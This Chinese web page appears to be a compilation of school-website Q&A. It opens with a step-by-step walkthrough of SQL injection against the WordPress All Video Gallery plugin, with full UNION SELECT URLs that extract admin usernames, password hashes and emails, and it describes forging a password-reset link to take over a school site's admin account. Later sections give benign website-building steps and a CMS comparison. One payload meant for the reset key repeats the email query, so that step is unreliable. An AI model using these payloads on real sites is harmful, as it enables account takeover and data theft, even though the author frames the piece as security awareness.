SQL注入的基本原理
sql注入成因主要是对页面参数没有进行非法字符校验导致,比如说一个订单页面要显示某个客户的所有订单列表,这个页面的地址可能是http://xxx.com/list.php?customID=3,我们推理,这样页面的后台处理的sql应该是这样的:
select * form custom_order where custom_id = {$_GET['customID']}
按正常情况下,这里的接收的参数{$_GET['customID']}的值应该是传入的值3,这样页面就能正确的把所有客户ID等于3的订单信息显示到页面上。但是,如果这个参数被人恶意改成了如下形式:
http://xxx.com/list.php?customID=-1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin
按这样的参数拼装成的sql就成了这样:
select * form custom_order where custom_id = -1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin
这样注入恶意sql后,订单列表页显示的就不是订单信息了,而是数据库中用户的名称和密码,或者任意其它想要的信息。下面我们就按照这个原理来一步一步的获取这个公立学校网站的管理员用户名,管理员邮箱地址,通过邮箱重置管理员密码,登录超级管理员后台。
All Video Gallery插件的漏洞简介
安装了All Video Gallery插件的Wordpress博客里会有这样的一个地址:
http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11
访问这个页面会显示一些配置信息,问题就出在pid这个参数上,程序后台显然没有严格检查这个参数,我们将利用这个参数进行sql注入。
WordPress是一个开源的平台,我们很容易弄清楚用户表的表名是wp_users,存放用户名,密码,邮件地址的字段分别是user_login,user_pass,user_email,我们下面将要把用户信息表注入进去。
获取超级管理员用户名
为了获取用户表中的用户名,我们注入的sql是这样的:
http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users
在浏览器里输入上面的地址,页面上会显示下面的信息:
获取超级管理员邮件地址
我们可以直接获取用户的密码,但很显然,密码都是加密的,无法使用,我们这里使用另外一种思路,先获取用户的邮件地址,然后使用这个邮件重置用户的密码。
要获取邮件地址,我们需要将上面的sql中的字段名改成user_email:
http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users
在浏览器里输入上面的地址,页面上会显示下面的信息:
重置管理员密码
WordPress的后台登陆地址是http://xxx.com/wp-login.php,这个地址是可以公共访问的,我们进入这个页面后,点击Lost your password?链接,输入上面获取的管理员邮件。
这样做了之后,Wordpress会向这个邮件地址发送一封含有激活码的密码重置地址。我们无法登陆这个邮箱获取这个地址,但我们可以使用上面同样
的方法获取这个激活码,自己拼装出密码重置地址。存放激活码的字段是user_activation_key,我们的sql注入地址改成下面这样:
http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users
在浏览器里输入上面的地址,页面上会显示下面的信息:
有了激活码,我们就可以拼装出装置密码的地址了:
http://xxx.com/wp-login.php?action=rp&key=resetkey&login=username
利用这个地址进入重置密码页面:
总结
我们的黑客行动到此基本上是大功告成,但事实上我并没有去执行最后一步。本文的目的不是要告诉人们如何进行黑客攻击,而是要提醒大家防范安全漏洞,
所谓知己知彼,方能百战不殆,程序员应当对基本的黑客攻击方式有一些了解,针对性的在编程时避免造成类似sql注入的安全漏洞,构筑更健壮的软件。
B. 求一个关于学校的Html+Css的静态网站源码
直接去下载网站系统来做,适合做学校的比如pageadmin系统、wordpress系统这些都可以。
C. 一个学校网站应该包含哪些栏目
一般的网站后台都可以自己增加栏目的,你网站难道没有后台吗?
你可以去下载专业网站管理系统来用算了,
比如pageadmin系统、wordpress系统、shopex系统这些都很好用
D. 网站建设的步骤有哪些
一、确定网站主题网站主题就是你建立的网站所要包含的主要内容,一个网站必须要有一个明确的主题。特别是对于个人网站,你不可能像综合网站那样做得内容大而全,包罗万象。你没有这个能力,也没这个精力,所以必须要找准一个自己最感兴趣内容,做深、做透,办出自己的特色,这样才能给用户留下深刻的印象。网站的主题无定则,只要是你感兴趣的,任何内容都可以,但主题要鲜明,在你的主题范围内内容做到大而全、精而深。
2
二、为网站选择域名
一个企业的网站域名被称为“网络商标”,一个与企业名称和形象相符的网站域名,是企业实现网络营销的前提。而网站是企业在互联网上宣传和展示企业形象的重要途径。由于网站的域名具有唯一性,网站域名一旦注册成功,任何其他组织机构或个人都无法注册相同的域名。因此,网站的域名是企业重要的网络标识,在网络营销中起到企业"网络商标"的作用,注册域名时,要考虑到域名与企业的名称、标识相符合。一个好的域名应该要简洁,方便用户记忆。
3
三、网站空间服务器的选择
一个网站的建设需要有自己的网站空间,要选择合适的网站空间服务器,空间的大小主要根据网站的规模、网站的内容多少来选择,一般情况下,大型企业资金实力雄厚,而且基于企业自身庞大的网站数据库以及数据安全方面的考虑,选择购置自己的服务器进行架设是比较好的;而中小型的企业网站建设比较乐于选择虚拟主机服务,这样便可以省去服务器的管理及维护大笔费用。
一般的中小型企业网站选择大小在100M-200M的虚拟主机空间就足够用了。
4
四、规划网站一个网站设计得成功与否,很大程度上决定于设计者的规划水平,规划网站就像设计师设计大楼一样,图纸设计好了,才能建成一座漂亮的楼房。网站规划包含的内容很多,如网站的结构、栏目的设置、网站的风格、颜色搭配、版面布局、文字图片的运用等,你只有在制作网页之前把这些方面都考虑到了,才能在制作时驾轻就熟,胸有成竹。也只有如此制作出来的网页才能有个性、有特色,具有吸引力。
5
五、制作网页材料有了,工具也选好了,下面就需要按照规划一步步地把自己的想法变成现实了,这是一个复杂而细致的过程,一定要按照先大后小、先简单后复杂来进行制作。所谓先大后小,就是说在制作网页时,先把大的结构设计好,然后再逐步完善小的结构设计。所谓先简单后复杂,就是先设计出简单的内容,然后再设计复杂的内容,以便出现问题时好修改。在制作网页时要多灵活运用模板,这样可以大大提高制作效率。
6
六、上传测试网页制作完毕,最后要发布到Web服务器上,才能够让全世界的朋友观看,现在上传的工具有很多,有些网页制作工具本身就带有FTP功能,利用这些FTP工具,你可以很方便地把网站发布到自己申请的主页存放服务器上。网站上传以后,你要在浏览器中打开自己的网站,逐页逐个链接的进行测试,发现问题,及时修改,然后再上传测试。全部测试完毕就可以把你的网址旺合盛世科技告诉给朋友,让他们来浏览。
7
七、维护更新网站要注意经常维护更新内容,保持内容的新鲜,不要一做好就放在那儿不变了,只有不断地给它补充新的内容,才能够吸引住浏览者
E. 教育类网站国微cms和帝国cms哪个更好一些
帝国CMS
非常老牌的CMS,就如同该CMS官网介绍的安全、强大、稳定、灵活。
安全性:高,姜就是老的辣,老牌的CMS就是靠谱,安全性四颗星★★★★☆。
模板丰富度:帝国CMS的模板与程序分离,在二次开发与模板设计上非常灵活,这样就决定着要对PHP有一点了解,标签的参数较为复杂,网络上的资源较为丰富,但是模板的导入导出功能对新手不太友好,同时扩展库也较为丰富,三颗星★★★☆☆。
上手简易度:帝国CMS后台设置参数较多,所有信息皆存储在数据库中,功能搭配上较为严谨,对新手来说需要一定的学习成本,三颗星★★★☆☆。
国微CMS
国微CMS为国内最主流的CMS系统之一,也是中国南方PHP领域最大的开源平台提供商。现拥有平台注册用户超过23万,下载次数达到70余万次,主要面向政府、军队、学校、集团级客户。耕耘八年,国微CMS采用二代框架,在系统高性能、速度、模块化、体系化、可视化等方面极具核心竞争优势, 可确保客户运营成功。
网络转载!